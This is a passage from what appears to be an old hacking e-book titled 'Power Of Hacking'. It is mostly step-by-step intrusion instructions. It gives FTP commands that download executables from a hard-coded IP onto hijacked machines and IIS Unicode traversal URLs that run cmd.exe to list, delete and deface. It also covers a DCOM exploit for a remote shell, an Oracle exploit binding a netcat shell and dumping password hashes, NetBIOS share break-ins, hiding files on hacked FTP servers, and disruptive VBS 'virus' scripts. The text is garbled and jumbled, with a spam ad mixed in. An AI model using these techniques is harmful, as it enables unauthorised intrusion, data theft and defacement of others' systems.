Power Of Hacking For sa pass: site exec osql.exe -U sa -P "sa" -Q "sp_password sa,Logon,sa" for password pass: site exec osql.exe -U sa -P "password" -Q "sp_password password,Logon,sa" For admin pass: site exec osql.exe -U sa -P "admin" -Q "sp_password admin,Logon,sa"
That will change the Logon to sa/Logon instead of sa/sa or sa/blank. Securing it from being rehacked.
Thats all Folks! Happy UK BOYS!!
Closing Notes: I spent many hours on this tutorial. I know it's not perfect, im open to suggestions/comments. But please do not give this out without giving full credit to me (the author
Not that anybody here would to that.
Commands:echo open 62.2.239.111 >> C:\3.txt
echo anonymous >> C:\3.txt Mail:mtahirzahid@yahoo.com
Page 46
Power Of Hacking
echo anonymous@dude.com >> C:\3.txt
echo BINARY >> C:\3.txt
echo get tsksrv.exe >> C:\3.txt
echo get ml_hconf.dll >> C:\3.txt
echo quit >> C:\3.txt
ftp -i -s:C:\3.txt ====================================== del c:\3.txt Want to make 800 a month doing nothing? Well of course you would, why wouldn’t you? It’s easier than you thought and this file has sure proven ways to make you rich quick. Don’t waist your time with cheap affiliate programs and pyramid scams. It’s a lot easier to just download a little plug-in! Just follow these easy steps: 1. Sign up at http://www.download4cash.tk 2. Advertise your site, make an e-book, and submit your site to search engines. (Hint: use peer 2 peer file sharing programs like Kazaa or WinMX) 3. Sit back and collect your money! I wish you the best of luck on your trip to becoming rich like me! Have fun! And Good luck! Advanced pub taggin:The purpose of this post is to show ya folks how to very securely lock a pub up making it very difficult and time consuming to crack. Thus this will greatly increase PUB vitality, I strongly recomend that you take my intro to pub taggin' before engaging in this tutorial (just so ya get the hang of it). ¤¤Flashfxp is the only program that will get the job done here¤¤
Mail:mtahirzahid@yahoo.com
Page 47
Power Of Hacking Step 1. Finding a Hidden Directory 1. Take an addy from a scan.. ie (208.34.124.35) and use the quick connect feature in flashfxp to connect 2. Once connected look for a hidden directory. In the path type in " /" that's "space/" with no quotation marks. About 50% of the time a pub will have one of these, it is not visible in the root directory... thus a good place to start for your tag. 3. Note if there isn't a hidden directory to start... I recomend finding the most inconspicuos path with the most folders... ie. /receive/Windows/Application Data/Microsoft/Internet Explorer/UserData/CPIJSPYR/ and then start your tag from there. Step 2. Going Deep (Making a Series of Folders) 1. Start by making a folder and labeling it "1" with out the quotations 2. Go into this folder and create folder "2" and so on 3. Soo your path should now look something like this... 208.34.124.35/ /1/2/3/4/5/6/7/8/9/10/ if you are starting from a hidden directory I recomend going about 10 directories deep, if you are starting from an "inconspicuous path" I say go 5 deep or so. 4. Now rename your last directory "10" to something like ".UpLoAd_HeRe" and do NOT lock it. 5. make note of the path on a txt document... and update it as you go along. So right now you have: 208.34.124.35/ /1/2/3/4/5/6/7/8/9/.UpLoAd_HeRe/ Continue renaming the path using various locking techniques (NEXT STEP) backwards and updating the txt document Step 3. Use of Locking Techniques note: Okay it's time to get creative. Not only are you going to lock up the path but you are also going to make deceptive locked folders that will piss a pub cracker of.. and thus they may just leave it alone b/c it is not worth the time. 1. Typical piss off locked folder. Mail:mtahirzahid@yahoo.com
Page 48
Power Of Hacking -Make a com or aux type folder ie. com1 (for a review on how to make these read my introduction to pub taggin' tutorial) -Okay... so it's time to get sneaky, ie. if you labeled your folder com3 make a bundle more com folders... here are your options: i. make a multitude of com3 folders by varying the spacing ie. "com3 / /" "com3 / /" "com3 / /" eventually the folder looks like this (PLEASE NOTE THE com3 spacing that you made for yourself on the txt document): com3 com3 com3 com3 com3 com3 com3 com3 com3 -just looking at that would make me not want to bother cracking it. ii. making com1-com9 folders com1 com2 com3 com4 com5 com6 etc.
2. ALT Codes - by using ALT codes you can also piss of Cracker To use ALT codes you must hold the ALT button and then press a combination of number keys (the ones located on the right side of your keyboard) **at the end of the name of the ALT Code directory place a "." and then lock it (you can also put a "." at the start to make the directory invisible (recomended). ie. ".____¤§¤TÃGgÊÐ_ßý_M®._ÐþG¤§¤___. / /" so you will see it as ".____¤§¤TÃGgÊÐ_ßý_M®._ÐþG¤§¤___." Mail:mtahirzahid@yahoo.com
Page 49
Power Of Hacking -now take note of the directory you created (copy it to your txt document) and procede to make variations of that locked folder by varying the spacing on the lock, or the Alt Codes used, the net result is that you will have a tough to crack multitude of piss of directories. and it will look like this .____¤§¤TÃGgÊÐ_ßý_M®._ÐþG¤§¤___. .____¤§¤TÃGgÊÐ_ßý_M®._ÐþG¤§¤___. .____¤§¤TÃGgÊÐ_ßý_M®._ÐþG¤§¤___. .____¤§¤TÃGgÊÐ_ßý_M®._ÐþG¤§¤___. .____¤§§¤TÃGgÊÐ_ßý_M®._ÐþG¤§§¤___. .____¤¤§¤TÃGgÊÐ_ßý_M®._ÐþG¤§¤¤___. .____¤¤§¤TÃGgÊÐ_ßý_M®._ÐþG¤§¤¤___.
¤¤OKAY YOU ARE ON YOUR WAY TO CREATING SOME BAD AZZ LOCKED PUBS¤¤ Here is and example of what your end product should look like: Code: -------------------------------------------------------------------------------<ftp://213.**.***.***/> /com7 /.__¤§¤HÍÐÐËN_PÃtH¤§¤__. /aux /.__¤PuB§_fËr_ThÊ_PËÊp§¤__. /com5 /.__¤§CÃnNËÐ_by_§iMÔn¤__. /com2 /.__¤TÃGgËd_fÔR_LÔu¤__. /.UpLoAd_HeRe/
--------------------------------------------------------------------------------
And here's a convenient list of ALT Codes for gettin' the job done: Code: -------------------------------------------------------------------------------¤ = Alt+15 ¶ = Alt+20 § = Alt+21 Ç = Alt+128 ü = Alt+129 é = Alt+130 â = Alt+131 ä = Alt+132 à = Alt+133 å = Alt+134 ç = Alt+135 ê = Alt+136 ë = Alt+137 è = Alt+138 ï = Alt+139 î = Alt+140 ì = Alt+141 Ä = Alt+142 Å = Alt+143 É = Alt+144 æ = Alt+145 Æ = Alt+146 ô = Alt+147 ö = Alt+148 ò = Alt+149 û = Alt+150 ù = Alt+151 ÿ = Alt+152 Ö = Alt+153 Ü = Alt+154 ¢ = Alt+155 £ = Alt+156 ¥ = Alt+157 ƒ = Alt+159 á = Alt+160 í = Alt+161 ó = Alt+162 ú = Alt+163 ñ = Alt+164 Ñ = Alt+165 ª = Alt+166 º = Alt+167 ¿ = Alt+168 ¬ = Alt+170 ½ = Alt+171 ¼ = Alt+172 ¡ = Alt+173 « = Alt+174 » = Alt+175 ¦ = Alt+179 ß = Alt+225 µ = Alt+230 ± = Alt+241 ÷ = Alt+246 ° = Alt+248 • = Alt+249 · = Alt+250 ² =Alt+253 „ = Alt+0132 … = Alt+0133 † = Alt+0134 ‡ = Alt+0135 ˆ = Alt+0136 ‰ = Alt+0137 Š = Alt+0138 Œ = Alt+0140 Ŕ = Alt+0150 ŕ = Alt+0151 ˜ = Alt+0152 ™ = Alt+0153 š = Alt+0154 œ = Alt+0156 Ÿ = Alt+0159 © = Alt+0169 ® = Alt+0174 ³ = Alt+0179 ¹ = Alt+0185 º = Alt+0186 ¾ = Alt+0190 À = Mail:mtahirzahid@yahoo.com
Page 50
Power Of Hacking Alt+0192 Á = Alt+0193 Â = Alt+0194 Ã = Alt+0195 È =Alt+0200 Ê = Alt+0202 Ë = Alt+0203 Ì = Alt+0204 Í = Alt+0205 Î = Alt+0206 Ï = Alt+0207 Ð = Alt+0208 Ò = Alt+0210 Ó = Alt+0211 Ô = Alt+0212 Õ = Alt+0213 × = Alt+0215 Ø = Alt+0216 Ù = Alt+0217 Ú = Alt+0218 Û = Alt+0219 Ý = Alt+0221 Þ = Alt+0222 ä = Alt+0228 õ = Alt+0245 ø = Alt+0248 ý = Alt+0253 þ = Alt+0254 i will tell u how to scan and hack using this exploit first get a scanner scanms.exe will do to scan u go to cmd and write scanms.exe ip_start-ip_send ex: scanms.exe 127.0.0.1-127.255.255.255 the scanner will start working and u will get some results like these IP Address REMACT SYSACT DCOM Version ----------------------------------------------------127.0.97.246 [? ? ] [....] 5.4 127.0.99.26 [ptch] [ptch] 5.6 127.0.101.81 [....] [ptch] 0.0 127.0.97.218 [....] [VULN] 0.0 127.0.70.132 [ptch] [ptch] 5.6 127.0.101.210 [VULN] [VULN] 5.6 127.0.96.40 [ptch] [ptch] 5.6 127.0.97.238 [....] [VULN] 0.0 127.0.103.137 [....] [VULN] 0.0 127.0.100.226 [....] [VULN] 0.0 127.0.100.170 [....] [VULN] 0.0 then u delete the patch one and edit the vuln to slow only the ip but u need to get atention to dcom version in this case 0 and 5 then u get universal.exe a nice exploit that is the best rigth now 0-all win2k 5-all winxp
then u make universal.exe 0 ip
if u get luck u will get a shell in return now to secure make this:intall the ftp and upload reg.exe the registry editor then write reg.exe delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole /v EnableDCOM here anser yes then reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole /v EnableDCOM /t REG_SZ /d N and thats all IIS Hacking Tutorial Mail:mtahirzahid@yahoo.com
Page 51
Power Of Hacking All the stuff work on IIS 4/5 servers with with out any security updates! ************ INTRO:Hacking an iis server is pretty much like taking candy from a baby. No really its that easy. In this tutorial im going to walk you through 0wnz'ing your very own iis server and show you haw to deface the site but i seriously dont encourage this. I dont agree with needless defacing unless its your first time, but im not against defacing to stand up for your rights, punish a site with bad intensions(even though the site can be rebuilt) or to make a strong point. If your going to use the *i defaced your site because it had bad security*, you could just as easily mail the admin. Im telling you all how to do this so u know how easy it is. Please dont abuse the information i give you. ---------------------------------------------************ Finding vulnerable servers:There are *many , many* vulnerabilities with iis but im going to discuss one of the latest. This vulnerability allow the execution of arbituary code. To see if a site is vulnerable try these links www.TARGET.com/scripts/..%255c..%25....exe?/c+dir+c:\
www.TARGET.com/msadc/..%255c..%255c....exe?/c+dir+c:\ www.TARGET.com/cgi-bin/..%255c..%25....exe?/c+dir+c:\ www.TARGET.com/samples/..%255c..%25....exe?/c+dir+c:\ www.TARGET.com/iisadmpwd/..%255c..%....exe?/c+dir+c:\ www.TARGET.com/_vti_cnf/..%255c..%2.../system32/cmd.e xe?/c+dir+c:\ www.TARGET.com/_vti_bin/..%255c..%2.../system32/cmd.e xe?/c+dir+c:\ www.TARGET.com/adsamples/..%255c..%.../system32/cmd.e xe?/c+dir+c:\ If the server is vulnerable you should get a listing of the C drive. If none of these links work, the server probably isn't vulnerable. Ok, so lets say you got a list or the c content, it should look something like: -------------------------------------------Mail:mtahirzahid@yahoo.com
Page 52
Power Of Hacking Directory of c:\ 11/15/02 08:50a (DIR) WINNT 11/15/02 09:15a (DIR) Program Files 11/15/02 09:20a (DIR) TEMP 11/15/02 09:21a (DIR) CPQ SYSTEM 11/15/02 09:50a (DIR) Inetpub 11/27/02 08:11a (DIR) CPQSUPSW 11/29/02 09:12a (DIR) CA_LIC 12/01/02 09:42a 140 server ip address.txt 04/06/02 04:44p 55,769 systemlog 06-04.txt 05/04/02 12:32p (DIR) test
10 File(s) 1,159,703,933 bytes 1,322,123,264 bytes free ---------------------------------------------To navigate just change the links to: /system32/cmd.exe?/c+dir+c:\winnt For example to navigate to the WINNT directory To navigate to a folder such as CPQ SYSTEM you would have to put: /system32/cmd.exe?/c+dir+c:\cpqsys~1 There must be six characters before the ~1 and no spaces (Normal rules DOS). Use DOS on your (or where ever there is a win32 b0x) own pc, this will greatly help you when it comes to using simple commands such as copy, or listing content of a directory. Now in order to find the main page of the website. We must find the webroot. The webroot is the path in which all the files for the site are held, including the main page. In my experience the webroot is usually found on the D: drive but it can be any directory the admin chooses. Try: /system32/cmd.exe?/c+dir+d:\ Mail:mtahirzahid@yahoo.com
Page 53
Power Of Hacking This should list the content of the drive D drive. Also a good tip, a lot of sites have *mock* webroots, in which you think you have found the sites main page but its not really, just a copy. You will have to visit the site and find the size of the main page and the other pages linked to it (right click and click properties - Normal win32 trik) and then match it up with the files in the webroot to find the real main page. --------------------------------------- Now is a good time to give you some commands that will come in useful: To list all chosen files on the server use: www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/ winnt/system32/cmd.exe?/c%20dir%20/S%20c:\*.whatever
To DOWNLOAD a file use: www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/ winnt/system32/cmd.exe?/c%20type\c%20c:\whatever.file When asked: What would you like to do with this file? choose: *run this program from its current location*. Choosing save to disk will get you a properties report of that file or something like that. To DELETE (del) a file use: www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/ winnt/system32/cmd.exe?/c%20del%20c:\whatever.file
To make a text file use: www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/ winnt/system32/cmd.exe?/c%20echo%20You txt goes here!!!!!>%20test.txt -------------------------------------************ Changing the mainpage.htm Now on to the important part, editing the websites main page. HTML is not needed but if you want to an in any way decent looking deface you need to know it. If you dont know it dont worry and text in a file with .htm or .html extension will show up in a browser. If Mail:mtahirzahid@yahoo.com
Page 54
Power Of Hacking you want to learn html it can be done by anybody, i learned the basics in about 1 day. Ok, enough woman - girlie! talk, to the man stupid - you have to copy the file CMD.exe to the directory with the page in it, lets call this page, wannabie_admin.html and lets say the directory wannabie_admin.html is in is C:\home\site So the COPY command:www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/ winnt/system32/cmd.exe?/c%20copy%20c:\winnt\system32\cmd.exe%20C:\home\site\CMD.exe That will copy CMD.exe (like command.com in win98) to d:\home\site
now to paste the text we want into wannabie_admin.html: www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/ home/site/CMD.exe?/c%20echo%20Damn Wannabies! You run IIS and you just been cracked>%20wa nnabie_admin.html Now your text should now be on the main page. If you echo html code into wannabie_admin.h tml, youll get a much better defacement. If your are going to do it, do it RIGHT! ------------------------------------- Please, please listen to me, IIS servers >>>-LOG-<<< all the stuff! so use a >>>-PROXY-<<<
Scanning in Windows (Normal):
Tools needed: fxscanner <-- handy because it can scan IIS & Pubs at the same time... hxxp://members.home.nl/m.hazebroek/progjes/FXScanner.ace
Open fxscanner and go to Exploits enable both exploits(if you want) : IIS and FTP (port 21: pubs)
Go to Options and edit the threads to about 50 threads
Mail:mtahirzahid@yahoo.com
Page 55
Power Of Hacking Go to IIS Unicode standard the program hasn't got enough unicodes so download more: hxxp://members.home.nl/m.hazebroek/progjes/Unicode.rar overwrite the Unicode.txt file with your original one.
Now goto scan and goto target selection, you can add the range there by using wildcards, example: 128.10.*.* now you click on add and the range has been added to the que. you can add as much ranges as you want. If you're finished adding range(s) click on Go. you can view the results by clicking on results (duh...) or by browsing to the fxscanner directorie. The file http.txt contains the IIS results and ftp.txt contains the pubs.
Scanning Remote:
Tools needed: fxscanner hxxp://members.home.nl/m.hazebroek/progjes/FXScanner.ace
Before reading this I advise you to first read the normal scan instructions.. If you did lets go then...
Upload the files Fxscanner.exe and file.txt to a stro. rename Fxscanner.exe to something else like svchost.exe or something. goto raw command (cltr-w) and type: Mail:mtahirzahid@yahoo.com
Page 56
Power Of Hacking quote: site exec svchost.exe -h
then: quote: site exec svchost.exe -f
refresh now (f5) you have to see a new file called scanner.ini, edit it and set threads to about 10. You may try more threads but it is likely that the admin will find out you're scanning because of the memory you use. goto raw command (cltr-w) and type: quote: site exec svchost.exe -stop
trace.log file has been made (refresh) then again: quote: site exec svchost.exe -h
then again: quote: Mail:mtahirzahid@yahoo.com
Page 57
Power Of Hacking site exec svchost.exe -f
then if you like: (closes scanner on remote side when done scanning): quote: site exec svchost.exe -c
Go to Rscanner.exe on your own pc, type the ip of the stro, rest may stay default. click on connect. Add the ranges as you read in normal scan. You may close Rscanner. After a while you can check you're stro.. the results are in: ftp.txt an http.txt you can also log in any time 2 see how far it is with scanning. Invisible Directories: They are directories that doesn't get listed. A sample path of an invisible directory is: /.tmp/ /folder1/ The 'space' isn't a name, but a character, so it can't be listed, and the user won't see anything beyond the .tmp folder. The 'period' in front of tmp is to hide it from conventional FTP clients and somewhat from the site admin because by default, folders with a "." in front of them are considered to be hidden files and does not get listed by default. I found that SmartFTP can 'see' these so-called invisible directories (/ /) by default. To create the above path, you have to enter the paths in FlashFXP exactly (replace <space> with spacebar) in following steps after hitting the insert key to create dirs. You have to create the directory in step one first before you can create the directory in step two and so on: /.tmp/<space>/ Mail:mtahirzahid@yahoo.com
Page 58
Power Of Hacking /.tmp/<space>/<space>/ /.tmp/<space>/folder1/ <-- This is your working directory.
Inaccessible Directories: These are directories that you can't enter even if you see it. You can simply type the following in this order to do this: /folder1<space>/<space>/ /folder1<space>/folder2/ <-- This is your working directory. You won't be able to get pass /folder1 / unless you know the name of folder2. A safer method is to use the following "unusable names". COM1, COM2, COM3, COM4 -- Windows COM Ports LPT1, LPT2, LPT3, LPT4 -- Windows Printer Ports If you try to enter such a directory, you'll be returned with an incorrect function. A sample path of an inaccessible directories is: /COM1 /folder1/ To create the above path, you have to enter the paths in FlashFXP exactly (replace <space> with spacebar) in the following steps after hitting the insert key to create dirs: /COM1<space>/<space>/ /COM1<space>/folder1/ <-- This is your working directory. Step-by-Step Sample Invisible/Inaccessible Dir: Again, enter the following exactly as you see it and replace the <space> with your spacebar and "folder1" and "folder2" with anything you want:
Mail:mtahirzahid@yahoo.com
Page 59
Power Of Hacking /<space>/<space>/ /<space>/COM1<space>/<space>/ /<space>/COM1<space>/<space>/<space>/ /<space>/COM1<space>/<space>/LPT1<space>/<space>/ /<space>/COM1<space>/<space>/LPT1<space>/yourname<space>/<space>/ /<space>/COM1<space>/<space>/LPT1<space>/folder1<space>/folder2/ Confusing?
Your working directories is the last line, or this:
/ /COM1 / /LPT1 /folder1 /folder2/ It is hidden through two (no name) folders and made inaccessible by one folder (folder1) and two "unusable names" (COM1, LPT1). Just want to say that the above examples are assuming that you're making dirs in the root. Most likely, you'll encounter pubs that only allow read/write access to only certain directories such as "/upload", "/pub", "/incoming", "/_vti_pvt", and others. In that case, you'll have to add this to the path at the beginning. For example, if the working directory is "pub", then you'll have: /pub/<space>/<space>/ /pub/COM1<space>/<space>/ /pub/COM1<space>/<space>/<space>/ -- and so on... Be creative in creating directories! Netbios Hacking:Steps 1. Check if IP or host has netbios enabled 2. Input IP and relating sharename into HOSTS file 3. Find computer 4. If share is password protected, use resources to get around protection. 5. 0wn the b0x! 1. Before even trying anything with netbios, you must have netbios enabled and you must have file sharing enabled. First we must determine if the remote computer has netbios enabled, because without netbios Mail:mtahirzahid@yahoo.com
Page 60
Power Of Hacking being enabled on your computer and the remote computer, none of the following will be able to happen. To check the remote computers netbios status, DOS has a utility just for that, NBTSTAT.EXE In win9x/ME, it's located at \windows In windows 2000/XP, it's located at \winnt\system32 Nbtstat is run from the DOS prompt only, just open a DOS prompt and type in "nbtstat", no quotes, but to find out if the remote computer is exploitable and if we can access it, we use a certain nbtstat command, "nbtstat -A ip address",no quotes. If the command returns an output of "host not found", either the remote computer does not have file sharing enabled or the host is not responding to that command. But if the command returns a list, then the command was successful and netbios is enabled. The listing you now get might be confusing but we are only really looking for a certain thing here. The <20> shows that the remote computer has file sharing enabled among other things. Other services listed might be the messenger service and the name of the currently logged on user. The name in front of the <20> is the sharename; this is basically what is needed to now gain access to the computer.
2. Now that we have the IP and the sharename of the computer, we can now move on to putting those into the HOSTS file. The HOSTS file is a file that windows looks at when it does any network translations from IP to netbios name and vice versa. Windows will always look at the HOSTS file before it looks any where else to translate, if windows finds the IP and netbios name its looking for, it doesn't go searching anywhere else like a central server. The HOSTS file has no file extension in windows; its simply just called "HOSTS". in 9x/ME, its located at \WINDOWS in 2000/XP, its located at \WINDOWS\system32\drivers\etc Don't freak out if its not found because on a default installation of windows, there is no HOSTS file, you have to make one. It's very easy, just browse to the directory of where its supposed to be located and right click and go to new > text document, save it in the directory as "HOSTS", no quotes, now you have a HOSTS file. Make sure the file does not have a ".txt" extension, remember that the file just needs to be named "HOSTS". Windows may ask you to confirm that you want to have the file with no extension, this is ok and correct. Now go back and get the IP and sharename you just found, insert the IP first and then a space and insert the sharename.After the IP and sharename are in the HOSTS file, click file > save. Now it's time to see if we can actually get in. 3. On win9x/me systems go to start > search > find computer. On windows 2000 its the same, but for XP you go to start > search > file or folders, then click the label on the left hand side called "computers or people". Enter the IP of the remote computer and search for it, it should show up on the list and you double click the computer to access its shares.If a box pops up and asks for a Mail:mtahirzahid@yahoo.com
Page 61
Power Of Hacking password, then you can use a program called pqwak to brute force the password, it may take time to break the password. But mostly you will not encounter a password box; I personally have only encountered 1 out of dozens. Now you can browse freely the shared hard drive or share. When browsing, it's very slow, because of latency and windows has a flaw with task schedule it slows down network browsing when using netbios, task schedule checks the remote computer for any tasks at hand. Just let windows explorer take the information off of the remote computer, it may take time, but it's very easy now to see what's on the remote computer. On some windows 2000 and windows NT systems, certain directories are not accessible due to restrictions to browsing local directories, you may try to open the windows directory and get a box saying that the directory is off limits and due to administrator restrictions you cannot open the directory. Oracle:Hacking Technique: Oracle Hacking Active Port: 1521 Most Vulnerable Machines: Oracle Needed Exploits: Oracle.rar Needed Scanners: Any port scanner ( in this tutorial we will use Scan1000.exe as our favorit scanner ) Needed Files: Java Runtime Environment ( www.javasoft.com ) and classes111.zip ( www.oracle.com ) Background: The Oracle Auditing Tools are to be run against Oracle servers on the Microsoft Windows platform. How To Use: Extract Oracle.rar to chosen directory, NowScan With Scan1000.exe port 1521 Some range and wait untill you find something. When Finding Machine, you need to Exploit the machine By Simply go to the extracted Directory, and type cd oat , and now ose -s Machine'sIP. Now you Should see that the Machine is exploited, and NC Session is starting on port 31337. Use NC.exe to connect to the target Machine with port 31337 ( NC.exe [Machine's IP] [Port] ). Files Explanations: OracleSamDump - Connects to the Oracle server and executes TFTP get, to fetch the pwdump2 binary. The server is then pwdump2:ed and the result is returned to the SAM folder of the TFTP server. Mail:mtahirzahid@yahoo.com
Page 62
Power Of Hacking OracleSysExec - Can be run in interactive mode, letting the user specify commands to be executed by the server or in automatic mode. In automatic mode, netcat is tftpd over to the server and binds a shell to the tcp port 31337. OracleTNSCtrl - is used to query the TNS listener for various information, like the Oracle lsnrctl utility. It is somewhat limited though. Use the help command to see commands curently implemented.How To Secure: To protect the Machine, upgrade the Oracle Server ( http://www.oracle.com - Oracle 8.1.6 is the latest version ).http://members.lycos.nl/forallmymembers/exploit/Oracle.rar Ports list:0 Reserved
1 Port Service Multiplexer
4 Unassigned
5 Remote Job Entry
2 Management Utility 3 Compression Process
6 Unassigned
7 Echo
8 Unassigned 9 Discard
10 Unassigned 11 Active Users 12 Unassigned 13 Daytime 14 Unassigned 16 Unassigned 17 Quote of the Day 18 Message Send Protocol 20 File Transfer [Default Data] 21 File Transfer [Control] 23 Telnet
15 Unassigned
19 Character Generator
22 SSH Remote Login Protocol
24 any private mail system 25 Simple Mail Transfer
26 Unassigned
27 NSW User System FE 28 Unassigned 29 MSG ICP 30 Unassigned 31 MSG Authentication 32 Unassigned 33 Display Support Protocol 34 Unassigned35 any private printer server 36 Unassigned 37 Time 38 Route Access Protocol39 Resource Location Protocol 40 Unassigned Spearway Lockser VISUAL BASIC VIRUS PROGRAMMER BY TAHIR:Backspacehack:_ MsgBox "Let's go back a few steps" Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{bs}" loop Mail:mtahirzahid@yahoo.com
Page 63
Power Of Hacking saveas tahir.vbs capslockhack:Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop saveas tahir.vbs cdromcloseopen:Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop cdromejecthelper:Wscript.Sleep 100 On Error Resume Next StrAgentName2 = "MERLIN" Mail:mtahirzahid@yahoo.com
Page 64
Power Of Hacking StrAgentPath2 = "C:\Windows\Msagent\Chars\" & strAgentName2 & ".Acs" Set objAgent2 = CreateObject("Agent.Control.2") ObjAgent2.Connected = TRUE ObjAgent2.Characters.Load strAgentName2, strAgentPath2 Set objPeter = objAgent2.Characters.Character(strAgentName2) ObjPeter.MoveTo 700,300 ObjPeter.Show ObjPeter.Play "GetAttention" ObjPeter.Play "GetAttentionReturn" ObjPeter.Speak("watch as I open your cd drive") Wscript.Sleep 1000 Set objAction= objPeter.Hide Do While objPeter.Visible = True Wscript.Sleep 250 Loop Wscript.Sleep 100
Set oWMP = CreateObject("WMPlayer.OCX.7" ) Set colCDROMs = oWMP.CdromCollection
If colCDROMs.Count >= 1 then For I = 0 to colCDROMs.Count - 1 ColCDROMs.Item(I).Eject Next ' cdrom Mail:mtahirzahid@yahoo.com
Page 65
Power Of Hacking End If Saveas tahir.vbs Continually pop the CD Drive:Set oWMP = CreateObject(“WMPlayer.OCX.7?) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop saveas tahir.vbs dancehackcapslock,scrolllock,numlock:Set wshShell =wscript.CreateObject("WScript.Shell")
do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" wshshell.sendkeys "{NUMLOCK}" wshshell.sendkeys "{SCROLLLOCK}" loop Mail:mtahirzahid@yahoo.com
Page 66
Power Of Hacking saveas tahir.vbs ejectcdrom:do Set oWMP = CreateObject("WMPlayer.OCX.7" ) Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next ' cdrom End If
Loop Saveas tahir.vbs Enterhack:Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "~(enter)" loop saveas tahir.vbs foolhackmessage:Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "You are a fool." Mail:mtahirzahid@yahoo.com
Page 67
Power Of Hacking Loop Saveas tahir.vbs hackcapslock,scrolllock,numlocksdance:Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 200 wshshell.sendkeys "{CAPSLOCK}" wscript.sleep 100 wshshell.sendkeys "{NUMLOCK}" wscript.sleep 50 wshshell.sendkeys "{SCROLLLOCK}" loop saveas tahir.vbs helper Microsoft:On Error Resume Next StrAgentName2 = "MERLIN" StrAgentPath2 = "C:\Windows\Msagent\Chars\" & strAgentName2 & ".Acs" Set objAgent2 = CreateObject("Agent.Control.2") ObjAgent2.Connected = TRUE ObjAgent2.Characters.Load strAgentName2, strAgentPath2 Set objPeter = objAgent2.Characters.Character(strAgentName2) ObjPeter.MoveTo 700,300 ObjPeter.Show ObjPeter.Play "GetAttention" ObjPeter.Play "GetAttentionReturn" ObjPeter.Speak("Hi I'm Tahir here to take control of your computer") Mail:mtahirzahid@yahoo.com
Page 68
Power Of Hacking Wscript.Sleep 1000 Set objAction= objPeter.Hide Do While objPeter.Visible = True Wscript.Sleep 250 Loop Saveas tahir.vbs helperopenInternetExplorer:Wscript.Sleep 100 On Error Resume Next StrAgentName2 = "MERLIN" StrAgentPath2 = "C:\Windows\Msagent\Chars\" & strAgentName2 & ".Acs" Set objAgent2 = CreateObject("Agent.Control.2") ObjAgent2.Connected = TRUE ObjAgent2.Characters.Load strAgentName2, strAgentPath2 Set objPeter = objAgent2.Characters.Character(strAgentName2) ObjPeter.MoveTo 700,300 ObjPeter.Show ObjPeter.Play "GetAttention" ObjPeter.Play "GetAttentionReturn" ObjPeter.Speak("lol I now open internet explorer") Wscript.Sleep 1000 Set objAction= objPeter.Hide Do While objPeter.Visible = True Wscript.Sleep 250 Loop Wscript.Sleep 100 Mail:mtahirzahid@yahoo.com
Page 69
Power Of Hacking Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "iexplore http://www.Google.Com", 9 WScript.Sleep 10000 ' Give ie some time to load Saveas tahir.vbs Registryenableordisable:'Enable/Disable Registry Editing tools 'Š Doug Knox - rev 12/06/99 'This code may be freely distributed/modified as long as it remains free of charge 'http://www.icpug.org.uk/national/features/030607fe.htm 'Edited by PatheticCockroach - http://patheticcockroach.com
Option Explicit 'Declare variables Dim WSHShell, rr, rr2, MyBox, val, val2, ttl, toggle Dim jobfunc, itemtype
On Error Resume Next
Set WSHShell = WScript.CreateObject("WScript.Shell") val = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools" val2 = "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools" itemtype = "REG_DWORD" jobfunc = "Registry Editing Tools are now " ttl = "Result"
'reads the registry key value. Mail:mtahirzahid@yahoo.com
Page 70
Power Of Hacking rr = WSHShell.RegRead (val) rr2 = WSHShell.RegRead (val2)
toggle=1 If (rr=1 or rr2=1) Then toggle=0
If toggle = 1 Then WSHShell.RegWrite val, 1, itemtype WSHShell.RegWrite val2, 1, itemtype Mybox = MsgBox(jobfunc & "disabled.", 4096, ttl) Else WSHShell.RegDelete val WSHShell.RegDelete val2 Mybox = MsgBox(jobfunc & "enabled.", 4096, ttl) End If Saveas tahir.vbs Sleepvirus:cls :A color 0a cls @echo off echo Wscript.Sleep 5000>C:\sleep5000.vbs echo Wscript.Sleep 3000>C:\sleep3000.vbs echo Wscript.Sleep 4000>C:\sleep4000.vbs echo Wscript.Sleep 2000>C:\sleep2000.vbs Mail:mtahirzahid@yahoo.com
Page 71
